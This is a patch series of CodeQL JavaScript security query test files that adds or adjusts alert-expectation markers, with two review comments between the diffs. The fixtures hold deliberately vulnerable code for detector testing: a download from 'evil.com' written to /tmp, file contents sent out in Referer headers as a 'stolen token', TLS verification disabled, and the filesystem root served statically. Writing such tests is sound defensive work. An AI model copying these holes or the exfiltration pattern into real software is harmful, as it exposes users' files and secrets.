@@ -330,27 +330,27 @@ function incompleteComplexSanitizers() { } function typicalBadHtmlSanitizers(s) { - s().replace(new RegExp("[<>]", "g"),''); // $ Alert + s().replace(new RegExp("[<>]", "g"),''); } function typicalBadHtmlSanitizers(s) { - s().replace(new RegExp("[<>]", unknown()),''); // $ Alert + s().replace(new RegExp("[<>]", unknown()),''); } function bad18NewRegExp(p) { - return p.replace(new RegExp("\\.\\./"), ""); // $ Alert + return p.replace(new RegExp("\\.\\./"), ""); } function bad4NewRegExpG(s) { - return s.replace(new RegExp("\'","g"), "\\$&"); // $ Alert + return s.replace(new RegExp("\'","g"), "\\$&"); // $ Alert[js/incomplete-sanitization] } function bad4NewRegExp(s) { - return s.replace(new RegExp("\'"), "\\$&"); // $ Alert + return s.replace(new RegExp("\'"), "\\$&"); // $ Alert[js/incomplete-sanitization] } function bad4NewRegExpUnknown(s) { - return s.replace(new RegExp("\'", unknownFlags()), "\\$&"); // $ Alert + return s.replace(new RegExp("\'", unknownFlags()), "\\$&"); // $ Alert[js/incomplete-sanitization] } function newlinesNewReGexp(s) { @@ -359,8 +359,8 @@ function newlinesNewReGexp(s) { x.replace(new RegExp("\n", "g"), "").replace(x, y); x.replace(x, y).replace(new RegExp("\n", "g"), ""); - x.replace(new RegExp("\n"), "").replace(x, y); // $ Alert - x.replace(x, y).replace(new RegExp("\n"), ""); // $ Alert + x.replace(new RegExp("\n"), "").replace(x, y); // $ Alert[js/incomplete-sanitization] + x.replace(x, y).replace(new RegExp("\n"), ""); // $ Alert[js/incomplete-sanitization] x.replace(new RegExp("\n", unknownFlags()), "").replace(x, y); x.replace(x, y).replace(new RegExp("\n", unknownFlags()), ""); diff --git a/javascript/ql/test/query-tests/Security/CWE-178/tst.js b/javascript/ql/test/query-tests/Security/CWE-178/tst.js index 4d320438eb54..9394d6303fa0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-178/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-178/tst.js 
@@ -88,7 +88,7 @@ app.get('/baz3/a', (req, resp) => { resp.send({ test: 123 }); }); -app.use(/\/summonerByName|\/currentGame/,apiLimit1, apiLimit2); +app.use(/\/summonerByName|\/currentGame/,apiLimit1, apiLimit2); // $ Alert app.get('/currentGame', function (req, res) { res.send("FOO"); diff --git a/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.js b/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.js index 4509c3c6cc76..d197c141cb14 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.js @@ -7,4 +7,4 @@ https.get({ path: "/upload", method: "GET", headers: { Referer: content } -}, () => { }); +}, () => { }); // $ Alert[js/file-access-to-http] diff --git a/javascript/ql/test/query-tests/Security/CWE-200/lib/tst.js b/javascript/ql/test/query-tests/Security/CWE-200/lib/tst.js index b534af05b92f..23c29cde28ad 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/lib/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/lib/tst.js @@ -4,8 +4,8 @@ var path = require("path"); var app = express(); -app.use('basedir', express.static(__dirname)); // $ Alert +app.use('basedir', express.static(__dirname)); // $ Alert[js/exposure-of-private-files] const rootDir = __dirname; -app.use('basedir', express.static(rootDir)); // $ Alert +app.use('basedir', express.static(rootDir)); // $ Alert[js/exposure-of-private-files] -app.use('/monthly', express.static(__dirname + '/')); // $ Alert \ No newline at end of file +app.use('/monthly', express.static(__dirname + '/')); // $ Alert[js/exposure-of-private-files] \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js b/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js index d1199c259e3e..c3aaec3926ff 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js 
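Review bot: The rewritten last line of CWE-200/lib/tst.js still ends without a trailing newline (`\ No newline at end of file` on both the old and new side), and the same holds for `}).listen(8080);` in the `@@ -67,7` hunk of private-file-exposure.js; since every line of both hunks is being rewritten anyway, adding the final newline now avoids a spurious `\ No newline` marker the next time these files change. Separately, this file tags every expectation as `$ Alert[js/exposure-of-private-files]` while the CWE-178/tst.js hunk just above uses the bare `$ Alert` form; if the bare form is intended only for single-query test directories, a one-line comment at the top of such files saying so would save the next editor from guessing which form to use.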
+++ b/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js 
@@ -5,21 +5,21 @@ var path = require("path"); var app = express(); // Not good. -app.use(express.static('./node_modules/angular')); -app.use('/angular', express.static('node_modules/angular')); -app.use('/animate', express.static('node_modules/angular-animate')); -app.use('/js', express.static(__dirname + '/node_modules/angular')); -app.use('/router', express.static(__dirname + '/node_modules/angular-route/')); -app.use(express.static('/node_modules/angular')); -app.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules'))); -app.use('/js',express.static('./')); -app.use('/angular', express.static("./node_modules" + '/angular/')); -app.use('/angular', express.static(path.join("./node_modules" + '/angular/'))); -app.use('/angular', express.static(path.join(__dirname, "/node_modules"))); -app.use('/angular', express.static(path.join(__dirname, "/node_modules") + '/angular/')); +app.use(express.static('./node_modules/angular')); // $ Alert[js/exposure-of-private-files] +app.use('/angular', express.static('node_modules/angular')); // $ Alert[js/exposure-of-private-files] +app.use('/animate', express.static('node_modules/angular-animate')); // $ Alert[js/exposure-of-private-files] +app.use('/js', express.static(__dirname + '/node_modules/angular')); // $ Alert[js/exposure-of-private-files] +app.use('/router', express.static(__dirname + '/node_modules/angular-route/')); // $ Alert[js/exposure-of-private-files] +app.use(express.static('/node_modules/angular')); // $ Alert[js/exposure-of-private-files] +app.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules'))); // $ Alert[js/exposure-of-private-files] +app.use('/js',express.static('./')); // $ Alert[js/exposure-of-private-files] +app.use('/angular', express.static("./node_modules" + '/angular/')); // $ Alert[js/exposure-of-private-files] +app.use('/angular', express.static(path.join("./node_modules" + '/angular/'))); // $ Alert[js/exposure-of-private-files] 
+app.use('/angular', express.static(path.join(__dirname, "/node_modules"))); // $ Alert[js/exposure-of-private-files] +app.use('/angular', express.static(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert[js/exposure-of-private-files] const rootDir = __dirname; const nodeDir = path.join(rootDir + "/node_modules"); -app.use('/angular', express.static(nodeDir + '/angular/')); +app.use('/angular', express.static(nodeDir + '/angular/')); // $ Alert[js/exposure-of-private-files] @@ -37,10 +37,10 @@ app.use('basedir', express.static(__dirname)); // OK - because there is no packa app.use('/monthly', express.static(__dirname + '/')); // OK - because there is no package.json in the same folder. const connect = require("connect"); -app.use('/angular', connect.static(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert -app.use('/angular', require('serve-static')(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert -app.use('/home', require('serve-static')(require("os").homedir())); // $ Alert -app.use('/root', require('serve-static')("/")); // $ Alert +app.use('/angular', connect.static(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert[js/exposure-of-private-files] +app.use('/angular', require('serve-static')(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert[js/exposure-of-private-files] +app.use('/home', require('serve-static')(require("os").homedir())); // $ Alert[js/exposure-of-private-files] +app.use('/root', require('serve-static')("/")); // $ Alert[js/exposure-of-private-files] // Bad documentation example function bad() { @@ -48,7 +48,7 @@ function bad() { var app = express(); - app.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules'))); // $ Alert + app.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules'))); // $ Alert[js/exposure-of-private-files] } // Good documentation example 
@@ -67,7 +67,7 @@ const serveHandler = require("serve-handler"); const http = require("http"); http.createServer((request, response) => { - serveHandler(request, response, {public: "./node_modules/angular"}); // $ Alert + serveHandler(request, response, {public: "./node_modules/angular"}); // $ Alert[js/exposure-of-private-files] serveHandler(request, response); }).listen(8080); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-200/readFileSync.js b/javascript/ql/test/query-tests/Security/CWE-200/readFileSync.js index dc86544b5d36..5c4df5220b80 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/readFileSync.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/readFileSync.js @@ -22,7 +22,7 @@ try { res.setEncoding('utf8'); }); - post_req.write(s); // $ Alert - post the data from file to request body + post_req.write(s); // $ Alert[js/file-access-to-http] - post the data from file to request body post_req.end(); } catch (e) { } diff --git a/javascript/ql/test/query-tests/Security/CWE-200/readStreamRead.js b/javascript/ql/test/query-tests/Security/CWE-200/readStreamRead.js index d20c27d0eae7..506eead886cf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/readStreamRead.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/readStreamRead.js @@ -26,7 +26,7 @@ fs.exists(fileName, function (exists) { res.setEncoding('utf8'); }); - req.write(chunk); // $ Alert - write data from file to request body + req.write(chunk); // $ Alert[js/file-access-to-http] - write data from file to request body req.end(); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-200/request.js b/javascript/ql/test/query-tests/Security/CWE-200/request.js index 22097c49f5ed..13c98c8fd939 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/request.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/request.js 
@@ -19,8 +19,8 @@ function PostXML(xmlData) headers: { "content-type": "application/xml", }, - body: xmlData // $ Alert - passing data from file to the request body - }, function (error, response, body){ + body: xmlData // passing data from file to the request body + }, function (error, response, body){ // $ Alert[js/file-access-to-http] console.log(response); }); } diff --git a/javascript/ql/test/query-tests/Security/CWE-200/sentAsHeaders.js b/javascript/ql/test/query-tests/Security/CWE-200/sentAsHeaders.js index f663e9f286da..9bd2122a183b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/sentAsHeaders.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/sentAsHeaders.js @@ -15,14 +15,14 @@ try { hostname: "sstatic1.histats.com", path: "/0.gif?4103075&101", method: "GET", - headers: { Referer: "http://1.a/" + content } // $ Alert - passing stolen token in a header - }, () => { }) + headers: { Referer: "http://1.a/" + content } // passing stolen token in a header + }, () => { }) // $ Alert[js/file-access-to-http] https1.get({ hostname: "c.statcounter.com", path: "/11760461/0/7b5b9d71/1/", method: "GET", - headers: { Referer: "http://2.b/" + content } // $ Alert - passing stolen token in a header - }, () => { }) + headers: { Referer: "http://2.b/" + content } // passing stolen token in a header + }, () => { }) // $ Alert[js/file-access-to-http] }); }); } diff --git a/javascript/ql/test/query-tests/Security/CWE-200/subfolder/private-file-exposure-2.js b/javascript/ql/test/query-tests/Security/CWE-200/subfolder/private-file-exposure-2.js index ec2e40a7c2b3..b6243e115f1c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/subfolder/private-file-exposure-2.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/subfolder/private-file-exposure-2.js 
@@ -3,4 +3,4 @@ var http = require('http') var app = express() var server = http.createServer(app) // Static files: -app.use(express.static(__dirname)) +app.use(express.static(__dirname)) // $ Alert[js/exposure-of-private-files] diff --git a/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar.js b/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar.js index 63aa2666c69d..016e89c00a9b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar.js +++ b/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar.js @@ -1 +1 @@ -window.parent.postMessage(userName, '*'); +window.parent.postMessage(userName, '*'); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar2.js b/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar2.js index 6a38d5a02a27..112f308499c3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar2.js +++ b/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar2.js @@ -10,4 +10,4 @@ window.parent.postMessage(password, '*'); // $ Alert window.parent.postMessage(data.bar, '*'); })(); -window.parent.postMessage(authKey, '*'); +window.parent.postMessage(authKey, '*'); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-295/tst2.js b/javascript/ql/test/query-tests/Security/CWE-295/tst2.js index 50f5ae277146..f36ccfbc0990 100644 --- a/javascript/ql/test/query-tests/Security/CWE-295/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-295/tst2.js @@ -5,7 +5,7 @@ let requestOptions = { "content-type": "application/json", "accept": "application/json" }, - rejectUnauthorized: false, + rejectUnauthorized: false, // $ Alert requestCert: true, agent: false } diff --git a/javascript/ql/test/query-tests/Security/CWE-312/build-leaks.js b/javascript/ql/test/query-tests/Security/CWE-312/build-leaks.js index 92ecbb49e58d..9d7648df8e33 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/build-leaks.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-312/build-leaks.js @@ -1,9 +1,9 @@ const webpack = require("webpack"); -var plugin = new webpack.DefinePlugin({ // $ Alert +var plugin = new webpack.DefinePlugin({ "process.env": JSON.stringify(process.env) -}); +}); // $ Alert[js/build-artifact-leak] new webpack.DefinePlugin({ 'process.env': JSON.stringify({ DEBUG: process.env.DEBUG }) }) diff --git a/javascript/ql/test/query-tests/Security/CWE-754/UnvalidatedDynamicMethodCall.js b/javascript/ql/test/query-tests/Security/CWE-754/UnvalidatedDynamicMethodCall.js index b7d99c2c9eec..4c2e13deaa64 100644 --- a/javascript/ql/test/query-tests/Security/CWE-754/UnvalidatedDynamicMethodCall.js +++ b/javascript/ql/test/query-tests/Security/CWE-754/UnvalidatedDynamicMethodCall.js @@ -12,5 +12,5 @@ var actions = { app.get('/perform/:action/:payload', function(req, res) { let action = actions[req.params.action]; - res.end(action(req.params.payload)); + res.end(action(req.params.payload)); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-770/MissingRateLimit/MissingRateLimiting.js b/javascript/ql/test/query-tests/Security/CWE-770/MissingRateLimit/MissingRateLimiting.js index 3fd3780bf860..8d89560e51f7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-770/MissingRateLimit/MissingRateLimiting.js +++ b/javascript/ql/test/query-tests/Security/CWE-770/MissingRateLimit/MissingRateLimiting.js @@ -5,7 +5,7 @@ app.get('/:path', function(req, res) { let path = req.params.path; if (isValidPath(path)) res.sendFile(path); -}); +}); // $ Alert function f1(req, res) { let path = req.params.path; @@ -22,4 +22,4 @@ function f3(req, res) { res.sendFile(path); } -app.get('/:path', f1, f2, f3); +app.get('/:path', f1, f2, f3); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js b/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js index 77645d0f3ac4..2a7c5d2f7b87 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js +++ b/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js @@ -3,6 +3,6 @@ var fs = require("fs"); https.get('https://evil.com/script', res => { res.on("data", d => { - fs.writeFileSync("/tmp/script", d) + fs.writeFileSync("/tmp/script", d) // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js index ad420927a5c4..95bc34a79cf6 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js @@ -335,7 +335,7 @@ function mergeSelective(dst, src) { if (dst[key]) { mergeSelective(dst[key], src[key]); } else { - dst[key] = src[key]; + dst[key] = src[key]; // $ Alert } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js index 8111eb36d94a..8f6ded8b2a91 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js @@ -8,13 +8,13 @@ app.get('/hello', function(req, res) { _.merge({}, req.query); // $ MISSING: Alert _.merge({}, { - value: req.query.value // $ Alert - }); + value: req.query.value + }); // $ Alert let opts = { thing: req.query.value // wrapped and unwrapped value }; _.merge({}, { - value: opts.thing // $ Alert - }); + value: opts.thing + }); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Statements/DanglingElse/tst.js b/javascript/ql/test/query-tests/Statements/DanglingElse/tst.js index ea1966d190b7..5ff77f4e77bc 100644 
--- a/javascript/ql/test/query-tests/Statements/DanglingElse/tst.js +++ b/javascript/ql/test/query-tests/Statements/DanglingElse/tst.js @@ -2,7 +2,7 @@ function bad1() { if (cond1()) if (cond2()) return 23; - else + else // $ Alert return 42; } @@ -18,7 +18,7 @@ function bad2() { if (cond1()) { if (cond2()) { return 23; - } else { + } else { // $ Alert return 42; }} } @@ -37,7 +37,7 @@ function bad3() { else if (cond2()) if (cond2()) return 42; - else + else // $ Alert return 42; } diff --git a/javascript/ql/test/query-tests/Statements/InconsistentReturn/tst.js b/javascript/ql/test/query-tests/Statements/InconsistentReturn/tst.js index 914229480a18..2b9be9c5874b 100644 --- a/javascript/ql/test/query-tests/Statements/InconsistentReturn/tst.js +++ b/javascript/ql/test/query-tests/Statements/InconsistentReturn/tst.js @@ -1,5 +1,5 @@ function f() { if (someCond()) - return; + return; // $ Alert return 42; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Statements/LabelInCase/nonCaseLabelInSwitch.js b/javascript/ql/test/query-tests/Statements/LabelInCase/nonCaseLabelInSwitch.js index 7eb15c1006ae..a06361e01438 100644 --- a/javascript/ql/test/query-tests/Statements/LabelInCase/nonCaseLabelInSwitch.js +++ b/javascript/ql/test/query-tests/Statements/LabelInCase/nonCaseLabelInSwitch.js @@ -1,7 +1,7 @@ switch (a) { case 0: case 1: - case2: + case2: // $ Alert f(); break; default: diff --git a/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.html b/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.html index f039917e0c73..c01acb8a6b32 100644 --- a/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.html +++ b/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.html @@ -4,7 +4,7 @@ 
diff --git a/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.js b/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.js index 11cc92b5b27a..f23767bfe19a 100644 --- a/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.js +++ b/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.js @@ -1,7 +1,7 @@ function bad1() { if (cond()) f(); - g(); + g(); // $ Alert } function good1() { @@ -22,7 +22,7 @@ function bad2() { f(); else g(); - h(); + h(); // $ Alert } function good3() { @@ -34,7 +34,7 @@ function good3() { function wbad1() { while (cond()) f(); - g(); + g(); // $ Alert } function wgood1() { diff --git a/javascript/ql/test/query-tests/Statements/ReturnOutsideFunction/tst.html b/javascript/ql/test/query-tests/Statements/ReturnOutsideFunction/tst.html index 6176fc9a39f1..7d80dd84642e 100644 --- a/javascript/ql/test/query-tests/Statements/ReturnOutsideFunction/tst.html +++ b/javascript/ql/test/query-tests/Statements/ReturnOutsideFunction/tst.html @@ -6,7 +6,7 @@ - +
diff --git a/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/tst.js b/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/tst.js index ba28c486ce31..6deedccfd340 100644 --- a/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/tst.js +++ b/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/tst.js @@ -146,4 +146,4 @@ for (const [key, key2, key3, value] of array) { } for (const [key, key2, key3, value] of array) {} // $ Alert -for (let i of [1, 2]) {} \ No newline at end of file +for (let i of [1, 2]) {} // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Statements/UnreachableStatement/tst.js b/javascript/ql/test/query-tests/Statements/UnreachableStatement/tst.js index 446e51ede1e4..a0a7ddf33416 100644 --- a/javascript/ql/test/query-tests/Statements/UnreachableStatement/tst.js +++ b/javascript/ql/test/query-tests/Statements/UnreachableStatement/tst.js @@ -2,7 +2,7 @@ function f() { return 23; - var a = 42; + var a = 42; // $ Alert } function g(x) { @@ -35,7 +35,7 @@ function k() { } throw new Error(); -f(); +f(); // $ Alert function l(x) { switch(x) { @@ -60,7 +60,7 @@ function m(x) { if (true) x; else - y; + y; // $ Alert function f(){ if (x) { diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/example.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/example.js index 53496ce2e4ef..cf0c23603e2a 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/example.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/example.js @@ -5,7 +5,7 @@ function findValue(values, x, start, end) { return i; } } - if (i < end) { + if (i < end) { // $ Alert return i; } return -1; 
diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/tst.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/tst.js index 4cc1fd775a43..58b9232cc161 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/tst.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/tst.js @@ -5,6 +5,6 @@ }); (function(){ - (function (i) { if (i == 100000) return; })(1); - (function f(i) { if (i == 100000) return; f(i+1); })(1); + (function (i) { if (i == 100000) return; })(1); // $ Alert + (function f(i) { if (i == 100000) return; f(i+1); })(1); // $ Alert }); diff --git a/javascript/ql/test/query-tests/WrongExtensionJSON/tst1.js b/javascript/ql/test/query-tests/WrongExtensionJSON/tst1.js index 5741191d62d3..fef5cb07408f 100644 --- a/javascript/ql/test/query-tests/WrongExtensionJSON/tst1.js +++ b/javascript/ql/test/query-tests/WrongExtensionJSON/tst1.js @@ -1,3 +1,3 @@ { "x": 42 -} \ No newline at end of file +} // $ Alert \ No newline at end of file From 07a876b4e94fb7d820ca5061ce085674e1b7d316 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 10:20:27 +0100 Subject: [PATCH 013/115] JS: Accept some alerts at the SystemCommandExecution location --- .../CWE-078/UnsafeShellCommandConstruction/lib/lib.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js index d932fbfe113e..3a5f05fac77e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js 
@@ -424,8 +424,8 @@ module.exports.shellOption = function (name) { spawn("rm", ["first", name], SPAWN_OPT); // $ Alert var arr = []; arr.push(name); // $ Alert - spawn("rm", arr, SPAWN_OPT); - spawn("rm", build("node", (name ? name + ':' : '') + '-'), SPAWN_OPT); // This is bad, but the alert location is down in `build`. + spawn("rm", arr, SPAWN_OPT); // $ Alert + spawn("rm", build("node", (name ? name + ':' : '') + '-'), SPAWN_OPT); // $ Alert } function build(first, last) { From f3956518072e720a25a81a8db6f9c625bd397fe0 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 11:38:03 +0100 Subject: [PATCH 014/115] JS: Mark alert as MISSING See https://github.com/github/codeql-javascript-team/issues/447 --- .../query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js index 739ec2a912be..667bbe822140 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js @@ -30,7 +30,7 @@ app.get('/user/:id', function(req, res) { ['Name', 'Content'], ['body', req.body] ]); - res.send(mytable); // $ Alert - FIXME: only works in OLD dataflow, add implicit reads before library-contributed taint steps + res.send(mytable); // $ MISSING: Alert - the 'markdown-table' model needs to be converted to a flow summary }); var showdown = require('showdown'); From 1f3c49638bdc35d769fb88b77fe6fc29f3f2b716 Mon Sep 17 00:00:00 2001 
From: Asger F Date: Wed, 12 Feb 2025 14:12:04 +0100 Subject: [PATCH 015/115] JS: Accept some less obvious alerts These are listed in a function called 'good' but it's difficult to say in isolation whether they should be flagged or not. Accepting the changes as they seem reasonable. --- .../Security/CWE-116/IncompleteSanitization/tst.js | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js index e18b45880bd3..8b7852f68535 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js @@ -126,18 +126,18 @@ function good11(s) { return s.replace("%d", "42"); } -function good12(s) { +function goodOrBad12(s) { s.replace('[', '').replace(']', ''); s.replace('(', '').replace(')', ''); s.replace('{', '').replace('}', ''); - s.replace('<', '').replace('>', ''); // too common as a bad HTML sanitizer + s.replace('<', '').replace('>', ''); // $ Alert[js/incomplete-sanitization] - s.replace('[', '\\[').replace(']', '\\]'); - s.replace('{', '\\{').replace('}', '\\}'); + s.replace('[', '\\[').replace(']', '\\]'); // $ Alert[js/incomplete-sanitization] + s.replace('{', '\\{').replace('}', '\\}'); // $ Alert[js/incomplete-sanitization] s = s.replace('[', ''); s = s.replace(']', ''); - s.replace(/{/, '').replace(/}/, ''); // should have used a string literal if a single replacement was intended + s.replace(/{/, '').replace(/}/, ''); // $ Alert[js/incomplete-sanitization] - should have used a string literal if a single replacement was intended s.replace(']', '').replace('[', ''); // $ Alert[js/incomplete-sanitization] - probably OK, but still flagged } From 68fae9ded8b84970c2a13f74a3bdcab368dedcdf Mon Sep 17 00:00:00 2001 
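Review bot: The rationale `too common as a bad HTML sanitizer` was dropped from the `s.replace('<', '').replace('>', '')` line when the marker was added, while the other markers in this hunk keep their trailing explanation (`- should have used a string literal ...`, `- probably OK, but still flagged`). Keeping it documents why this replacement is accepted as an alert in a function now named `goodOrBad12`: `s.replace('<', '').replace('>', ''); // $ Alert[js/incomplete-sanitization] - too common as a bad HTML sanitizer`. The two escaping lines (`'\\['`/`'\\{'`) gained markers with no explanation at all; a short reason there would help the next person who has to decide whether those are true positives.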
From: Asger F Date: Wed, 12 Feb 2025 14:12:38 +0100 Subject: [PATCH 016/115] JS: Accept alerts about newline replacement --- .../Security/CWE-116/IncompleteSanitization/tst.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js index 8b7852f68535..ff90b5dcd234 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js @@ -145,8 +145,8 @@ function newlines(s) { // motivation for whitelist require("child_process").execSync("which emacs").toString().replace("\n", ""); - x.replace("\n", "").replace(x, y); - x.replace(x, y).replace("\n", ""); + x.replace("\n", "").replace(x, y); // $ Alert[js/incomplete-sanitization] + x.replace(x, y).replace("\n", ""); // $ Alert[js/incomplete-sanitization] } app.get('/some/path', function(req, res) { From e5bee19b1951c6866727f9a4bd3d289d62036411 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 14:16:07 +0100 Subject: [PATCH 017/115] JS: Accept a double-flagged line This is flagged by two queries but for two separate issues. Seems valid to flag it twice. --- .../query-tests/Security/CWE-116/IncompleteSanitization/tst.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js index ff90b5dcd234..d89b37f31d69 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js 
